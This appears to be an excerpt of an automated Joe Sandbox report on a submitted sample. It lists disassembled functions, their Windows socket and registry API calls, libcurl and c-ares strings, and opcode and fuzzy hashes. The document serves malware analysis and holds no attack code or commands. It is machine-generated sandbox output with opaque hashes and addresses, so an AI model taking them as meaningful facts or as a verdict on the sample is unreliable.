                                                          Similarity
                                                          • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                                          • String ID: @$`
                                                          • API String ID: 2066228396-3318628307
                                                          • Opcode ID: 12addb2511919f48fcfd20eac09b16d1ad88dc5f21a8fcf2965671b371aa4bfc
                                                          • Instruction ID: be18763726eefba08c163bf3fa0280599399f84325bc61d64df0a0eb6b99f73f
                                                          • Opcode Fuzzy Hash: 12addb2511919f48fcfd20eac09b16d1ad88dc5f21a8fcf2965671b371aa4bfc
                                                          • Instruction Fuzzy Hash: 77D1B5B49043099FDB10EF78C58569EBBF0FF84344F008969E898A7356E7759A84CF92

                                                          Control-flow Graph

                                                          [Control-flow graph 1265, starting at 9829ff; API calls named on the graph: FindFirstFileA, RegOpenKeyExA, CharUpperA, QueryFullProcessImageNameA, CloseHandle]
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                          • String ID: 0
                                                          • API String ID: 2406880114-4108050209
                                                          • Opcode ID: 6dc46a517033e058a8b3445151669b8716470ecbea8891e33ce7c2bae0a0e6fb
                                                          • Instruction ID: e89cd780c6a39e1d6d991ebacf174543b9f9389e95bac9da76ad858b8e88f486
                                                          • Opcode Fuzzy Hash: 6dc46a517033e058a8b3445151669b8716470ecbea8891e33ce7c2bae0a0e6fb
                                                          • Instruction Fuzzy Hash: CEE117B49053099FDB10EF68D9856AEBBF4EF84300F408869E888E7395E774D984CF52

                                                          Control-flow Graph

                                                          [Control-flow graph 1586, starting at a4b180; API call named on the graph: getsockname]
                                                          APIs
                                                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 00A4B2B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: XL$`L$ares__sortaddrinfo.c$cur != NULL
                                                          • API String ID: 3358416759-1503282396
                                                          • Opcode ID: cb11c520e848b87ed14d222cbb2bb18860e011982feb7c4d2da257c652827834
                                                          • Instruction ID: fb0b5b49ddb937e4ba94ec221348694723d705c9ccf923deb06afb9debf58723
                                                          • Opcode Fuzzy Hash: cb11c520e848b87ed14d222cbb2bb18860e011982feb7c4d2da257c652827834
                                                          • Instruction Fuzzy Hash: DBC17E796143159FD718DF24C980A6AB7E1EFC8314F05896CF84A8B3A2DB34ED45CBA1

                                                          Control-flow Graph

                                                          [Control-flow graph 1730, starting at 9905b0; API calls named on the graph: WSAEventSelect, WSAEnumNetworkEvents]
                                                          APIs
                                                          • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00990712
                                                          • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 009909DD
                                                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 009909FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: EventSelect$EnumEventsNetwork
                                                          • String ID: multi.c
                                                          • API String ID: 2170980988-214371023
                                                          • Opcode ID: a66db29af5bde2df2314ba491a401e37af4b03bb82766b201dd68a3b995e258d
                                                          • Instruction ID: a318af10ec0da64d138d607574c8c1bb299a6f317553c362eb00eb1c92cb14e1
                                                          • Opcode Fuzzy Hash: a66db29af5bde2df2314ba491a401e37af4b03bb82766b201dd68a3b995e258d
                                                          • Instruction Fuzzy Hash: 5ED1CF716083019FEB10DF68CC81B6BB7E9BFD4358F04482CF9A486292E775E954CB92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 55cd4f0d7560e13cf1814de1e4c2e54d7c0c53143d78bc6d79f74d9fee5125ce
                                                          • Instruction ID: 5b2266dae7ad7de8bdf6cfbbdf5a3a13c6e44e73ddab01bc8ebf2be7e5eabbec
                                                          • Opcode Fuzzy Hash: 55cd4f0d7560e13cf1814de1e4c2e54d7c0c53143d78bc6d79f74d9fee5125ce
                                                          • Instruction Fuzzy Hash: 0591013062D3098BDB358BAD88907BBF2D9EFC5364F148B2CE8A9461D4EF749C50D691
                                                          APIs
                                                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00A3712E,?,?,?,00001001,00000000), ref: 00A4A90D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: recvfrom
                                                          • String ID:
                                                          • API String ID: 846543921-0
                                                          • Opcode ID: 0ebdc7364d7df4b9eed5c432c8b4cf46feb2ab5c886190ab9f97e31f4a7be29d
                                                          • Instruction ID: 30b9126ae089cb6482a0024e7138219a0e46b9ca4b6fce04ec80db41501c5527
                                                          • Opcode Fuzzy Hash: 0ebdc7364d7df4b9eed5c432c8b4cf46feb2ab5c886190ab9f97e31f4a7be29d
                                                          • Instruction Fuzzy Hash: 42F01D79218358AFD2109F41DC44DABBBEDEFC9754F05455DF958132119371AE10CAB2
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00A3AA19
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00A3AA4C
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00A3AA97
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00A3AAE9
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00A3AB30
                                                          • RegCloseKey.KERNELBASE(?), ref: 00A3AB6A
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00A3AB82
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00A3AC46
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00A3AD0A
                                                          • RegEnumKeyExA.KERNELBASE ref: 00A3AD8D
                                                          • RegCloseKey.KERNELBASE(?), ref: 00A3ADD9
                                                          • RegEnumKeyExA.KERNELBASE ref: 00A3AE08
                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00A3AE2A
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00A3AE54
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00A3AF63
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00A3AFB2
                                                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00A3B072
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$Open$CloseEnum
                                                          • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$XL$\L$`L
                                                          • API String ID: 4217438148-3520131594
                                                          • Opcode ID: 65911430438e3dd6cd2d0e94148aee6376e73f9e189d0153604a45b7b994ebae
                                                          • Instruction ID: 761494c8693c975f0978dfa8add029ffe285925b6b768136cd53fdbe1b5d7190
                                                          • Opcode Fuzzy Hash: 65911430438e3dd6cd2d0e94148aee6376e73f9e189d0153604a45b7b994ebae
                                                          • Instruction Fuzzy Hash: 3772DEB1608311AFE7209B24DD82B6BB7E8EF95700F14482CF985D72A1E775E944CB63
                                                          APIs
                                                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 009BA832
                                                          Strings
                                                          • @, xrefs: 009BA8F4
                                                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 009BA6CE
                                                          • Bind to local port %d failed, trying next, xrefs: 009BAFE5
                                                          • Local port: %hu, xrefs: 009BAF28
                                                          • Trying %s:%d..., xrefs: 009BA7C2, 009BA7DE
                                                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 009BAE1F
                                                          • Could not set TCP_NODELAY: %s, xrefs: 009BA871
                                                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 009BADAC
                                                          • cf_socket_open() -> %d, fd=%d, xrefs: 009BA796
                                                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 009BAD0A
                                                          • Local Interface %s is ip %s using address family %i, xrefs: 009BAE60
                                                          • bind failed with errno %d: %s, xrefs: 009BB080
                                                          • @, xrefs: 009BAC42
                                                          • cf-socket.c, xrefs: 009BA5CD, 009BA735
                                                          • Trying [%s]:%d..., xrefs: 009BA689
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: setsockopt
                                                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3981526788-2373386790
                                                          • Opcode ID: 5812739dbec0353945482620673d63444fa2c08ed4f570b0bf478278aa169440
                                                          • Instruction ID: 7529a036fab09f0abb173b511006687d31cc8af7c96b7661b0548d293411a5fd
                                                          • Opcode Fuzzy Hash: 5812739dbec0353945482620673d63444fa2c08ed4f570b0bf478278aa169440
                                                          • Instruction Fuzzy Hash: 8B62F471508341ABE721CF24C986BEBB7E9BF91324F04491DF98897292E771E845CB93

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00A49946
                                                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00A49974
                                                          • RegCloseKey.KERNELBASE(?), ref: 00A4998B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$`L$sts
                                                          • API String ID: 3677997916-272680077
                                                          • Opcode ID: 227ae61c3e32f63655cf1f35dcf3dc8a3e733f472c86bcc1baf152e25d1860d5
                                                          • Instruction ID: f306eefa72a2afea4c733b02255d73d477f50fa31749b4238cc50f31a360f1d3
                                                          • Opcode Fuzzy Hash: 227ae61c3e32f63655cf1f35dcf3dc8a3e733f472c86bcc1baf152e25d1860d5
                                                          • Instruction Fuzzy Hash: 5B3295B9904201ABEB11AB24ED42B1B76E8AF94354F084438F949D7263F732ED25D793

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          APIs
                                                          • connect.WS2_32(?,?,00000001), ref: 009B8C30
                                                          • SleepEx.KERNELBASE(00000000,00000000), ref: 009B8CF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: Sleepconnect
                                                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                          • API String ID: 238548546-879669977
                                                          • Opcode ID: c09b881d9c516100c606896e8744ea7372586c60481395e82aa4a2bb7e859707
                                                          • Instruction ID: 320ce4063dba3d08409e3b34310b92ab0ca84285d7fb5a01367d4e9785b90c13
                                                          • Opcode Fuzzy Hash: c09b881d9c516100c606896e8744ea7372586c60481395e82aa4a2bb7e859707
                                                          • Instruction Fuzzy Hash: DBB1A270604306AFDB10DF34CA85BA7BBA8AF99324F04892DE8594B2D2DB71EC55C761

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: EnumOpen
                                                          • String ID: d
                                                          • API String ID: 3231578192-2564639436
                                                          • Opcode ID: a2fb83c87c5e224d05c7edd1f734fdae777d172ccc524babfda37b71d9b9cd12
                                                          • Instruction ID: 3976d7fd03e85564fb3897d3fe0ecfc0f555154969d63339162928426b9d5756
                                                          • Opcode Fuzzy Hash: a2fb83c87c5e224d05c7edd1f734fdae777d172ccc524babfda37b71d9b9cd12
                                                          • Instruction Fuzzy Hash: 4571A5B49043199FDB10EF69C58579EBBF0BF84304F10886DE998A7341D7749A88CF92

                                                          Control-flow Graph (figure omitted): nodes call socket, ioctlsocket, connect
                                                          APIs
                                                          • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00A4AB9B
                                                          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00A4ABE4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: ioctlsocketsocket
                                                          • String ID: XL$`L
                                                          • API String ID: 416004797-645526465
                                                          • Opcode ID: 1f1b2342480a6275818e2ab09b4b82b0c86ddc3ddc9fbf3e35934af95f3a362f
                                                          • Instruction ID: 258057a51163741feacf843cba5857746c3414f4b82833558a4128f8277bcb96
                                                          • Opcode Fuzzy Hash: 1f1b2342480a6275818e2ab09b4b82b0c86ddc3ddc9fbf3e35934af95f3a362f
                                                          • Instruction Fuzzy Hash: 0FE1E1796443029BEB20CF24C885B6BB7E5EFD9300F044A2DF9A98B291D775DD44CB92

                                                          Control-flow Graph (figure omitted): nodes call WSAIoctl, setsockopt
                                                          APIs
                                                          • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 009B935D
                                                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 009B9388
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: Ioctlsetsockopt
                                                          • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                          • API String ID: 1903391676-2691795271
                                                          • Opcode ID: d8c9907b278fb285feb558fc9b9a7b2389d29e3d28e06c095871342545e43351
                                                          • Instruction ID: 066a19df00fd6f4e92d746f139f067a5d6fa8218bcbf79509d2e66b3cc9b48da
                                                          • Opcode Fuzzy Hash: d8c9907b278fb285feb558fc9b9a7b2389d29e3d28e06c095871342545e43351
                                                          • Instruction Fuzzy Hash: 0C51E370A04305ABD710DF24C981FAAB7A9FF84324F148529FE489B2D2E731E951CB91

                                                          Control-flow Graph (figure omitted): nodes call send
                                                          APIs
                                                          • send.WS2_32(multi.c,?,?,?,00983D4E,00000000,?,?,009907BF), ref: 009876EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                          • API String ID: 2809346765-3388739168
                                                          • Opcode ID: 8bf30b69eef78b78082b93d781bbe7f5cb0b7e93a5739c0b680bd5c2e684377e
                                                          • Instruction ID: 7265291726c5d4b16a17ae48cf2ad730f8c09d2cc437176f1768b6aff7b6aa63
                                                          • Opcode Fuzzy Hash: 8bf30b69eef78b78082b93d781bbe7f5cb0b7e93a5739c0b680bd5c2e684377e
                                                          • Instruction Fuzzy Hash: 58113AB16093087BD720B654AC96E37BB5CDFC2B68F151918F9046B382E662DC00C7B2

                                                          Control-flow Graph (figure omitted): nodes call gethostname
                                                          APIs
                                                          • gethostname.WS2_32(00000000,00000040), ref: 00A34AA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: gethostname
                                                          • String ID: XL$\L$`L
                                                          • API String ID: 144339138-3432740755
                                                          • Opcode ID: e61c8a0a151f3de7c882ed48e755872ead0042d2da82f67a58c2da26fa6ffba6
                                                          • Instruction ID: b2d827b933d0bcff42f8dca019cf0a2b6d68d1a78fff3839633acfc737f42987
                                                          • Opcode Fuzzy Hash: e61c8a0a151f3de7c882ed48e755872ead0042d2da82f67a58c2da26fa6ffba6
                                                          • Instruction Fuzzy Hash: E551D4B0A047018BE7309F25EE89727B6E4EF49315F14193DF98A866E1E775F884CB12

                                                          Control-flow Graph (figure omitted): nodes call recv
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                          • API String ID: 1507349165-640788491
                                                          • Opcode ID: 7c07560f883340d1b8b988d743a1b757f2bff9399eeb65b93ca8a0a5f96b5fd2
                                                          • Instruction ID: eced77a84b6d8bb4e9d6391a14ed04cbeed57953bf344c5599be68969904c57f
                                                          • Opcode Fuzzy Hash: 7c07560f883340d1b8b988d743a1b757f2bff9399eeb65b93ca8a0a5f96b5fd2
                                                          • Instruction Fuzzy Hash: 80110AB56083087BE220B654AC5AF37BB5CDFC6B68F151528F94867381D666DC00C7F1

                                                          Control-flow Graph

                                                          control_flow_graph 1907 9875e0-9875ed 1908 9875ef-9875f6 1907->1908 1909 987607-987629 socket 1907->1909 1908->1909 1912 9875f8-9875ff 1908->1912 1910 98762b-98763c call 9872a0 1909->1910 1911 98763f-987642 1909->1911 1910->1911 1913 987601-987602 1912->1913 1914 987643-987699 call 9872a0 call 98cb20 call d08c50 1912->1914 1913->1909
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                          • API String ID: 98920635-842387772
                                                          • Opcode ID: 5874aef046a6bc3680c1ac9e4e20ced3abebcc09ed90c2bd3fce29d1c3dc21b3
                                                          • Instruction ID: ba0cd53d71012d9ae5061abd5cd91dd9ea81e8ec8ce6d4c71fd4093dd1820777
                                                          • Opcode Fuzzy Hash: 5874aef046a6bc3680c1ac9e4e20ced3abebcc09ed90c2bd3fce29d1c3dc21b3
                                                          • Instruction Fuzzy Hash: 0B114872A4471537D7202AB8AC16F9B7B98EFC1774F152524F954A63D2E223C850C7E2

                                                          Control-flow Graph

                                                          control_flow_graph 1925 d08e90-d08eb8 _open 1926 d08eba-d08ec7 1925->1926 1927 d08eff-d08f2c call d09f70 1925->1927 1928 d08ef3-d08efa call d08d20 1926->1928 1929 d08ec9 1926->1929 1937 d08f39-d08f51 call d08ca8 1927->1937 1928->1927 1931 d08ee2-d08ef1 1929->1931 1932 d08ecb-d08ecd 1929->1932 1931->1928 1931->1929 1935 e11670-e11687 1932->1935 1936 d08ed3-d08ed6 1932->1936 1938 e11689 1935->1938 1939 e1168a-e116b1 1935->1939 1936->1931 1940 d08ed8 1936->1940 1944 d08f30-d08f37 1937->1944 1945 d08f53-d08f5e call d08cc0 1937->1945 1943 e116b9-e116bf 1939->1943 1940->1931 1946 e116c1-e116cf 1943->1946 1947 e116d9-e116fb 1943->1947 1944->1937 1944->1945 1945->1926 1950 e116d5-e116d8 1946->1950 1952 e11706-e1171b 1947->1952 1953 e116fd-e11704 1947->1953 1952->1946 1953->1952 1954 e1171d-e11732 1953->1954 1954->1950
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Similarity
                                                          • API ID: _open
                                                          • String ID: terminated$@
                                                          • API String ID: 4183159743-3016906910
                                                          • Opcode ID: 4ec5201d8ced5b3f361790d9c1758da959db6c3f811eb6fa8cc4a6e79e95f152
                                                          • Instruction ID: f259e9edabacd312deed7aa9356ed3a0300f4879a0d08adf9028f294eaa5f8f7
                                                          • Opcode Fuzzy Hash: 4ec5201d8ced5b3f361790d9c1758da959db6c3f811eb6fa8cc4a6e79e95f152
                                                          • Instruction Fuzzy Hash: FF416AB09083059FDB10EF79D4447AEBBF4AF48318F148A2DE898D7380EB35C8459B66

                                                          Control-flow Graph

                                                          control_flow_graph 1957 9ba150-9ba159 1958 9ba15f-9ba17b 1957->1958 1959 9ba250 1957->1959 1960 9ba249-9ba24f 1958->1960 1961 9ba181-9ba1ce getsockname 1958->1961 1960->1959 1962 9ba1d0-9ba1f5 call 99d090 1961->1962 1963 9ba1f7-9ba214 call 9bef30 1961->1963 1971 9ba240-9ba246 call 9c4f40 1962->1971 1963->1960 1967 9ba216-9ba23b call 99d090 1963->1967 1967->1971 1971->1960
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 009BA1C6
                                                          Strings
                                                          • ssloc inet_ntop() failed with errno %d: %s, xrefs: 009BA23B
                                                          • getsockname() failed with errno %d: %s, xrefs: 009BA1F0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3358416759-2605427207
                                                          • Opcode ID: e0151b4a3f97594a776067ced73620dd9ee16a1b358c13bc6948143b621f0c21
                                                          • Instruction ID: c0281cb9e6e005d0a6f0d2b137cdd392fe92fe4b6e79911772c6dec7a47e71ee
                                                          • Opcode Fuzzy Hash: e0151b4a3f97594a776067ced73620dd9ee16a1b358c13bc6948143b621f0c21
                                                          • Instruction Fuzzy Hash: 4A21B671908680BAF7259728DC42FE673ACAF81334F040659FA9853151FE32698686E3
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202), ref: 0099D65B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID: if_nametoindex$iphlpapi.dll
                                                          • API String ID: 724789610-3097795196
                                                          • Opcode ID: 2431c1120347f601f7558d98cf190ede56fbba6630c563a781ec5a63f791017a
                                                          • Instruction ID: e2dbc81c24d88ec13d8b16d3a6102fa9f67d3636de3675723ea6a2518a222686
                                                          • Opcode Fuzzy Hash: 2431c1120347f601f7558d98cf190ede56fbba6630c563a781ec5a63f791017a
                                                          • Instruction Fuzzy Hash: 960126E0A4634186EB21BB3CAD6B32735986B52304F852468FC88961C6F66DC898C293
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Similarity
                                                          • API ID: CloseEvent
                                                          • String ID: multi.c
                                                          • API String ID: 2624557715-214371023
                                                          • Opcode ID: ed6e6fad9bc8b529907bc34856a23d028f4f23cb7c57f5b9ca1ad17129f1ceb0
                                                          • Instruction ID: 287fb4affcae398d462666ed393b6f7c5b28e444c5d104159b83fc3994e689b0
                                                          • Opcode Fuzzy Hash: ed6e6fad9bc8b529907bc34856a23d028f4f23cb7c57f5b9ca1ad17129f1ceb0
                                                          • Instruction Fuzzy Hash: AA510CB6D043006BDB117E709C52B6776A8AF91318F184438E89E9B353FB36E509C793
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Similarity
                                                          • API ID: closesocket
                                                          • String ID: FD %s:%d sclose(%d)
                                                          • API String ID: 2781271927-3116021458
                                                          • Opcode ID: a556cb344c8b8f55156a8027e38fc24a97069e37baab43727581fe1ac74cad6d
                                                          • Instruction ID: 83b969c31d8923664e6a54e2924438ecd463364a233c06bd1103ad4538fac5a5
                                                          • Opcode Fuzzy Hash: a556cb344c8b8f55156a8027e38fc24a97069e37baab43727581fe1ac74cad6d
                                                          • Instruction Fuzzy Hash: 93D05E2290A2216B853069D9AC49D5BBBA89EC6F60B161858F95077304D121DC0183E2
                                                          APIs
                                                          • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00A4B29E,?,00000000,?,?), ref: 00A4B0BA
                                                          • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00A33C41,00000000), ref: 00A4B0C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLastconnect
                                                          • String ID:
                                                          • API String ID: 374722065-0
                                                          • Opcode ID: f1d0cf702d2560071c35d05a18cec25fa3113af56e23f86fed10838aa9e75a8f
                                                          • Instruction ID: 4aa732cefad1f2123236f1bdc2e708f35baa254b93a2e5836fa16e67db03fc55
                                                          • Opcode Fuzzy Hash: f1d0cf702d2560071c35d05a18cec25fa3113af56e23f86fed10838aa9e75a8f
                                                          • Instruction Fuzzy Hash: 4801D83A2142049BCB209B789C44E6BB3A9FFC9366F140754F978931D1D726ED509771
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 00A4AFD0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmp
